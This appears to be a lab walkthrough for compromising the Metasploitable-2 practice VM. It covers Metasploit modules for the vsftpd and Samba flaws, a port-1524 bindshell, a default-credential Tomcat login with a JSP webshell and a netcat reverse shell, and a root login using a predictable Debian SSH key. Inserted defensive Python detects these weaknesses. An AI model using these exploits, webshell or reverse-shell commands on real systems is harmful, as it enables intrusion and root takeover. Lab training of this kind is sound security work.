VulnHub Metasploitable-2

1. Information collection

Run an nmap scan against the target to enumerate open ports and service versions.

Browse to port 80 to see the web applications hosted on the box.

2. Vulnerability Exploitation

1. Vulnerability 1: vsftpd 2.3.4 (CVE-2011-2523)

The nmap output shows vsftpd 2.3.4, which has a known backdoor (CVE-2011-2523). Exploit it in msf:

msf6 > search vsftpd
msf6 > use 0
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set rhosts 192.168.103.189
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run



2. Vulnerability 2: Samba 3.x

The nmap output also shows a Samba service, version 3.x, which stood out as worth checking.

Search for the msf module that matches this Samba 3.x version (it is usermap_script).

Commands used in msf:

search samba 3.x

use exploit/multi/samba/usermap_script

show payloads

set payload cmd/unix/reverse

show options

set RHOSTS <target machine IP>

run

The session drops straight into a shell with root privileges.
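Sections 1 and 2 above boil down to one defensive routine: read the service versions nmap reports and map them to the exposures this writeup goes on to exploit. The Python below is an added example, not part of the writeup, that parses nmap's normal-output port lines and applies a small rule table (vsftpd 2.3.4, a Samba 3.x banner, the port 1524 listener, Tomcat on 8180). The scan text is constructed to resemble this target; banner-based matching is only a triage hint, since version strings can be spoofed or backported, so every hit still needs confirmation.

```python
import re

# Constructed sample in nmap's normal-output format (not a real scan); the
# services and ports are the ones this writeup goes on to exploit.
SAMPLE_NMAP = """\
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
22/tcp   open  ssh         OpenSSH
80/tcp   open  http        Apache httpd
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
1524/tcp open  bindshell
8180/tcp open  http        Apache Tomcat
"""

PORT_RE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)\s*(?P<version>.*)$"
)


def parse_nmap(text):
    """Turn nmap normal-output port lines into dicts; header and other lines are ignored."""
    services = []
    for line in text.splitlines():
        m = PORT_RE.match(line.strip())
        if m and m["state"] == "open":
            services.append({
                "port": int(m["port"]),
                "proto": m["proto"],
                "service": m["service"],
                "version": m["version"].strip(),
            })
    return services


# Each rule: (finding text, predicate over a parsed service entry). The findings
# are the weaknesses this writeup exploits, phrased for a remediation ticket.
RULES = [
    ("vsftpd 2.3.4 backdoor (CVE-2011-2523): upgrade or remove the FTP service",
     lambda s: re.search(r"\bvsftpd\s+2\.3\.4\b", s["version"]) is not None),
    ("Samba 3.x banner: exposed to usermap_script command injection; patch and restrict SMB",
     lambda s: s["service"] == "netbios-ssn" and re.search(r"Samba smbd 3\.", s["version"]) is not None),
    ("port 1524 listener: this writeup shows it is a backdoor shell; it should not exist at all",
     lambda s: s["port"] == 1524),
    ("Tomcat on 8180: verify the manager application is not reachable with default credentials",
     lambda s: s["port"] == 8180 and "Tomcat" in s["version"]),
]


def triage(nmap_text):
    """Return (port, finding) pairs for every open service that matches a rule."""
    findings = []
    for svc in parse_nmap(nmap_text):
        for text, matches in RULES:
            if matches(svc):
                findings.append((svc["port"], text))
    return findings


if __name__ == "__main__":
    for port, text in triage(SAMPLE_NMAP):
        print(f"{port}: {text}")
```

Feed it the saved output of the scan (`nmap -sV ... -oN scan.txt`) and extend RULES with whatever else your environment should never expose; the parser does not need the XML output, so it works on the text most people already have.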

3. Vulnerability 3: DVWA practice lab

DVWA (Damn Vulnerable Web Application) is also hosted on the box.

Default account and password:

Account:admin
Password: password

4. Vulnerability 4: backdoor on port 1524

Port 1524 runs a backdoor; connect to it with netcat:

┌──(root㉿kali)-[~/Desktop]
└─# nc 192.168.103.189 1524

5. Vulnerability 5: Apache Tomcat

1. Access port 80

The first site to check is the one on port 80.

Tomcat is on port 8180; check it next.

2. Tomcat vulnerability

Use the Tomcat Manager's WAR deployment to upload a file: open the Tomcat Manager and log in with the default account:

Account: tomcat
Password: tomcat

The manager page has a file upload point (deploying a WAR).

3. Upload the WAR package

A JSP webshell that echoes command output; package it into a WAR and upload it:

<%
    // only runs when the request carries the expected pwd value
    if("123".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
        int a = -1;
        byte[] b = new byte[2048];
        out.print("<pre>");
        while((a=in.read(b))!=-1){
            out.println(new String(b, 0, a)); // echo only the bytes actually read
        }
        out.print("</pre>");
    }
%>

// jar -cvf <war package name> <jsp webshell file>
jar -cvf tomcats.war tomcat.jsp

Then visit:
http://<target IP>:8180/<war package name>/<jsp file name>

http://192.168.103.187:8180/tomcats/tomcat.jsp?pwd=123&cmd=id

The id output shows the commands run as a low-privilege user, not root.

4. Reverse shell

┌──(root㉿kali)-[~/Desktop]
└─# nc -lvvp 4444
listening on [any] 4444 ...

http://192.168.103.187:8180/tomcats/tomcat.jsp?pwd=123&cmd=nc -e /bin/bash 192.168.103.129 4444

URL-encoded form (spaces as %20):
http://192.168.103.187:8180/tomcats/tomcat.jsp?pwd=123&cmd=nc%20-e%20/bin/bash%20192.168.103.129%204444

python -c 'import pty; pty.spawn("/bin/bash")'  # upgrade to an interactive shell

Check the kernel version: uname -a
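Seen from the defender's side, every step of this Tomcat section leaves a trace in the access log: a manager login, a POST to the manager's upload endpoint, then requests to a freshly deployed context carrying a cmd parameter. The Python below is an added example, not from the writeup, that scans constructed access-log lines for that sequence and, separately, checks a tomcat-users.xml for manager-role accounts with default or username-equals-password credentials. The log format, sample lines and the XML are all constructed; real Tomcat access-log layouts vary with the AccessLogValve pattern, so adjust LOG_RE to match yours.

```python
import re
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit, parse_qs

# Constructed sample of a Tomcat access log in the common-log prefix format
# (not real data). The requests mirror the steps above: manager login, WAR
# upload, then the uploaded JSP called with a cmd parameter.
SAMPLE_ACCESS_LOG = """\
192.168.103.129 - - [10/Jan/2024:10:01:02 +0000] "GET /manager/html HTTP/1.1" 401 2473
192.168.103.129 - tomcat [10/Jan/2024:10:01:09 +0000] "GET /manager/html HTTP/1.1" 200 17812
192.168.103.129 - tomcat [10/Jan/2024:10:01:30 +0000] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=ABC HTTP/1.1" 200 17900
192.168.103.129 - - [10/Jan/2024:10:02:00 +0000] "GET /tomcats/tomcat.jsp?pwd=123&cmd=id HTTP/1.1" 200 120
192.168.103.129 - - [10/Jan/2024:10:02:40 +0000] "GET /tomcats/tomcat.jsp?pwd=123&cmd=nc%20-e%20/bin/bash%20192.168.103.129%204444 HTTP/1.1" 200 0
10.0.0.5 - - [10/Jan/2024:10:03:00 +0000] "GET /dvwa/index.php HTTP/1.1" 200 3000
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)


def detect_tomcat_abuse(log_text):
    """Return (line_no, tag, detail) for requests matching the manager-abuse pattern."""
    findings = []
    for line_no, line in enumerate(log_text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        params = parse_qs(url.query)
        who = f"{m['user']} from {m['ip']}"
        if m["method"] == "POST" and url.path.startswith("/manager/") and url.path.endswith("/upload"):
            findings.append((line_no, "war_upload", who))
        elif url.path.startswith("/manager/") and m["status"] == "200":
            findings.append((line_no, "manager_access", who))
        if "cmd" in params:
            # parse_qs has already percent-decoded the value, so the analyst sees the real command
            findings.append((line_no, "cmd_param", params["cmd"][0]))
    return findings


# Constructed tomcat-users.xml containing the default account this writeup logs in with.
SAMPLE_TOMCAT_USERS = """\
<tomcat-users>
  <role rolename="manager"/>
  <role rolename="admin"/>
  <user username="tomcat" password="tomcat" roles="admin,manager"/>
  <user username="deploy" password="L0ng-random-passphrase" roles="manager"/>
</tomcat-users>
"""

DEFAULT_CREDS = {("tomcat", "tomcat")}


def find_weak_manager_accounts(xml_text):
    """Users holding a manager* role whose password is a known default or equals the username."""
    weak = []
    for el in ET.fromstring(xml_text).iter():
        if el.tag.rsplit("}", 1)[-1] != "user":   # tolerate a namespaced tomcat-users.xml
            continue
        name, pw = el.get("username", ""), el.get("password", "")
        roles = {r.strip() for r in el.get("roles", "").split(",")}
        manager_roles = sorted(r for r in roles if r.startswith("manager"))
        if manager_roles and (name == pw or (name, pw) in DEFAULT_CREDS):
            weak.append((name, manager_roles))
    return weak


if __name__ == "__main__":
    for finding in detect_tomcat_abuse(SAMPLE_ACCESS_LOG):
        print(finding)
    print(find_weak_manager_accounts(SAMPLE_TOMCAT_USERS))
```

The two checks complement each other: the XML check is what to run before exposing a Tomcat instance, and the log check is what to run when you suspect the manager has already been abused (a manager_access followed by war_upload and then cmd_param hits from the same source is the sequence shown above).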

5. SSH public key file

Finally, a public key file was found in the /root/.ssh directory.
Older versions can be exploited this way.

Because the system version here is old, the guess is that the openssl package has the pseudo-random number generator weakness, so the matching pre-generated key set is downloaded:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/5622.tar.bz2
(debian_ssh_rsa_2048_x86.tar.bz2)

.tar.bz2 reminder:
Extract: tar jxvf FileName.tar.bz2
Create: tar jcvf FileName.tar.bz2 DirName

tar jxvf 5622.tar.bz2

Then change into the rsa/2048 directory of the extracted archive and search the public keys for the one found on the target:

grep -l "AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w== msfadmin@metasploitable" *.pub

The file the command finds:

57c3115d77c56390332dc5c49978627a-5429

6. Root privileges

With the matching private key (the same file name without the .pub extension), log in directly as root:

┌──(root㉿kali)-[~/routing/rsa/2048]
└─# ssh root@<target IP> -i 57c3115d77c56390332dc5c49978627a-5429
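The grep in step 5, turned around, is a defender's control: fingerprint every key in authorized_keys and compare it with a list of known-weak keys (Debian shipped such lists as the openssh-blacklist package, with ssh-vulnkey to check them, and the 32-hex file names in the 5622 archive have the shape of an MD5 fingerprint without colons). The Python below is an added example, not part of the writeup, that parses OpenSSH public-key lines, computes the MD5 and SHA-256 fingerprints and the RSA size, and reports blacklisted, undersized or unparseable keys. The key line is constructed with a synthetic modulus and the blacklist set is a placeholder; a real audit would load the fingerprints of the published weak-key sets.

```python
import base64
import binascii
import hashlib
import struct

KEY_TYPES = ("ssh-rsa", "ssh-dss", "ssh-ed25519",
             "ecdsa-sha2-nistp256", "ecdsa-sha2-nistp384", "ecdsa-sha2-nistp521")


def _ssh_string(b):
    """Encode bytes as an SSH wire-format string (uint32 length prefix)."""
    return struct.pack(">I", len(b)) + b


def build_sample_rsa_pubkey_line(comment="msfadmin@metasploitable"):
    """Constructed 2048-bit RSA public key line; the modulus is synthetic, not a real key."""
    e = (65537).to_bytes(3, "big")
    n = b"\x00\x80" + b"\x00" * 255          # mpint: leading 0x00 because the top bit is set
    blob = _ssh_string(b"ssh-rsa") + _ssh_string(e) + _ssh_string(n)
    return "ssh-rsa " + base64.b64encode(blob).decode() + " " + comment


def _read_strings(blob):
    """Split a key blob into its length-prefixed fields."""
    fields, off = [], 0
    while off < len(blob):
        (length,) = struct.unpack(">I", blob[off:off + 4])
        off += 4
        fields.append(blob[off:off + length])
        off += length
    return fields


def parse_pubkey_line(line):
    """Parse one authorized_keys/.pub line into type, size, fingerprints and comment."""
    parts = line.split()
    idx = next((i for i, p in enumerate(parts) if p in KEY_TYPES), None)   # skip leading options
    if idx is None or idx + 1 >= len(parts):
        raise ValueError("no recognised key type in line")
    ktype, blob = parts[idx], base64.b64decode(parts[idx + 1], validate=True)
    fields = _read_strings(blob)
    if not fields or fields[0] != ktype.encode():
        raise ValueError("key type prefix does not match blob")
    bits = int.from_bytes(fields[2], "big").bit_length() if ktype == "ssh-rsa" else None
    return {
        "type": ktype,
        "bits": bits,
        "md5": hashlib.md5(blob).hexdigest(),   # the ssh-keygen -l -E md5 form with colons stripped
        "sha256": "SHA256:" + base64.b64encode(hashlib.sha256(blob).digest()).decode().rstrip("="),
        "comment": " ".join(parts[idx + 2:]),
    }


def audit_authorized_keys(text, blacklist_md5, min_rsa_bits=2048):
    """Return (line_no, finding) pairs for blacklisted, undersized or unparseable keys."""
    findings = []
    for line_no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        try:
            info = parse_pubkey_line(line)
        except (ValueError, IndexError, struct.error, binascii.Error):
            findings.append((line_no, "unparseable key line"))
            continue
        if info["md5"] in blacklist_md5:
            findings.append((line_no, "blacklisted weak key " + info["md5"]))
        if info["type"] == "ssh-rsa" and info["bits"] < min_rsa_bits:
            findings.append((line_no, f"RSA key only {info['bits']} bits"))
    return findings


if __name__ == "__main__":
    sample = build_sample_rsa_pubkey_line()
    placeholder_blacklist = {parse_pubkey_line(sample)["md5"]}   # stands in for a real weak-key list
    print(audit_authorized_keys(sample, placeholder_blacklist))
```

Run it over every authorized_keys on a host; a hit on the blacklist means the key was generated with a broken RNG and must be replaced, not merely moved, because the matching private key is in a public archive.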
